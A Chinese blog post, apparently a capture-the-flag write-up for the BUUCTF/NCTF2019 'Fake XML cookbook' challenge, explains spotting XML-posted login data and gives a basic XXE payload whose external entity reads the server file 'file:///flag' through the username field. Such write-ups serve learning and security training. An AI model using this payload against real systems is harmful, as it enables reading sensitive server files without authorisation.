【BUUCTF】[NCTF2019]Fake XML cookbook

于 2022-04-30 16:19:13 发布
阅读量381 收藏
点赞数 1
分类专栏: XXE 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/aoao331198/article/details/124514386
版权
这篇博客探讨了如何从理解XML的结构逐步深入到XXE(XML外部实体注入)漏洞的原理。通过示例展示了基本的XXE攻击构造,利用XML实体引用文件系统,揭示了网络安全中关于数据安全和输入验证的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

bp抓包观察,username和password是以xml文件形式post的
在这里插入图片描述
学习从XML相关一步一步到XXE漏洞
用最基本的XXE攻击

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY user SYSTEM "file:///flag">
]>
<user><username>&user;</username><password>123</password></user>

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值